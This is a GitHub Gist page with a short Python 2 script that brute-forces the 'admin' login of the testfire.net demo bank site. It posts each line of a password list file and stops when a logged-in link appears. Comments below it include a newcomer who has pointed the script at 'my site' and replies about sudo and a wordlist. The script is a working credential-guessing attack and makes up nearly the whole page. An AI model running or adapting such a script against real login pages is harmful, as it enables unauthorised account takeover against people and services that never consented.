Last active
October 6, 2019 05:56
-
-
Save prajal/6782604 to your computer and use it in GitHub Desktop.
Bruteforce program written in python
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
import requests | |
from bs4 import BeautifulSoup as BS | |
proxyDict = {"http" : "127.0.0.1:8082" } | |
url = "http://www.testfire.net/bank/login.aspx" | |
def connect(url,m): | |
t = requests.post("http://www.testfire.net/bank/login.aspx", data=m, proxies=proxyDict) | |
print t.text | |
soup = BS(t.text) | |
a=soup.find('a', id="_ctl0__ctl0_Content_AccountLink") | |
x = str(a.string) | |
print x | |
if x == "MY ACCOUNT" : | |
print "The password is" + " " + m['passw'] | |
sys.exit() | |
else: | |
print "Password %s not working" %m['passw'] | |
def controller(): | |
m = {} | |
f=open('password.txt','r').read().split('\n') | |
for line in f: | |
m["uid"] = "admin" | |
m["passw"] = str(line) | |
m["btnSubmit"] = "Login" | |
print m | |
connect(url,m) | |
controller() |
hi i am new on python , when I launch the program it doesn't work. must I be administrator to launch it ?(I replaced the url by my site)
hi I am new on python, when I launch the program it doesn't work. must I be administrator to launch it ?(I replaced the url by my site)
Ans to this will depend on what error you're getting, but you can try sudo python3 program_name.py
to see if it works, or else you can post error.
t = requests.post("http://www.testfire.net/bank/login.aspx", data=m, proxies=proxyDict)
t = requests.post(url, data=m, proxies=proxyDict)
better for understanding kind regards niek tuytel
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
password.txt is the passwords list,it might be dictionary based or the collection of passwords you have,Its depends up on your collections